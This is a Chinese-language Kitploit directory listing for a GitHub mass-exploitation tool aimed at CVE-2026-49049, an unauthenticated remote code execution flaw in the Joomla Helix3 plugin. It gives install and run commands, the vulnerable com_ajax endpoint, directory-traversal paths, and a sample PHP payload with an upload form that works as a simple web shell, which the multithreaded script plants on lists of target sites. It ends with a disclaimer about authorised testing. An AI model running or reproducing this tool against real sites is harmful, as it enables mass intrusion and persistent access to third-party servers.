Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-49049 — 大规模漏洞扫描器,针对 CVE-2026-49049——Joomla Helix3 插件中的未认证远程代码执行漏洞。支持多线程,可检测已执行及原始 PHP 载荷。 | Kitploit
工具/GitHubGitHub/jenderal92/cve-2026-49049
漏洞扫描器Web漏洞扫描器Payload生成漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubjenderal92/cve-2026-49049

CVE-2026-49049

大规模漏洞扫描器,针对 CVE-2026-49049——Joomla Helix3 插件中的未认证远程代码执行漏洞。支持多线程,可检测已执行及原始 PHP 载荷。

查看仓库
1141个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-49049 批量扫描器

针对 CVE-2026-49049 的批量漏洞扫描器 - Joomla Helix3 框架中的未授权远程代码执行漏洞。


📌 描述

该工具用于检查多个 Joomla 站点是否存在 Helix3 插件中的 CVE-2026-49049 漏洞。该漏洞允许未授权攻击者在目标服务器上上传并执行任意 PHP 代码。

扫描器尝试执行以下操作:

  1. 利用 com_ajax 端点与 helix3 插件进行攻击。
  2. 上传一个无害的 PHP 信息/载荷文件。
  3. 检测该文件是被执行还是仅以原始 PHP 形式存储。

⚡ 功能特性

  • 批量扫描,支持多线程(默认 20 个线程)。
  • 两种检测模式:
    • ✅ 存在漏洞 – PHP 代码被执行(RCE 成功)。
    • ⚠️ 原始 PHP – 文件已上传但未被执行(代码泄露)。
  • 自动生成载荷,使用随机文件名。
  • 输出保存到独立文件,便于进一步分析。
  • 轻量级且快速,具备超时处理。

📦 前置条件

  • Python 2.7
  • requests 库
root@kitploit:~
pip install requests

🛠 安装

root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py

🚀 使用方法

root@kitploit:~
python2 cve-2026-49049.py targets.txt

输入格式

targets.txt 中的每一行应包含一个域名或 IP:

root@kitploit:~
example.com
https://example.com
http://192.168.1.100

输出文件

文件 描述 results.txt 载荷已执行的漏洞 URL rez.txt 载荷已上传但未执行的 URL(原始 PHP)


示例输出

root@kitploit:~
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================

[*] Loaded 150 targets
[*] Using 20 threads

[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com

============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5

[+] Vulnerable URLs:
    https://target.com/tmp_123456.php.json

⚙️ 配置

您可以在脚本中调整以下变量:

变量 默认值 描述 THREADS 20 并发线程数 PATHS ['../../../', '../../../../'] 目录遍历路径 TIMEOUT 5 HTTP 请求超时时间 RESULT_FILE 'results.txt' 漏洞站点的输出文件 RAW_RESULT_FILE 'rez.txt' 原始 PHP 站点的输出文件


🧠 工作原理

该脚本向以下地址发送 POST 请求:

root@kitploit:~
/index.php?option=com_ajax&plugin=helix3&format=json

载荷会执行以下操作:

  1. 指定目录遍历路径(例如 ../../../)
  2. 上传一个随机命名的 PHP 文件
  3. 包含一个简单的 Web Shell / 信息页面

随后,脚本会检查该文件是否可访问,以及其中的 PHP 代码是被执行还是仅以纯文本形式显示。

载荷示例

root@kitploit:~
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>

⚠️ 免责声明

本工具仅用于教育和授权测试目的。

未经授权,将本工具用于您不拥有或未经明确许可测试的系统属于违法行为。作者不对因使用本工具造成的任何误用或损害负责。

更多免责声明:您可以在 Jenderal92 的封面上查看免责声明。您可以点击此处 !!!查看。


下载工具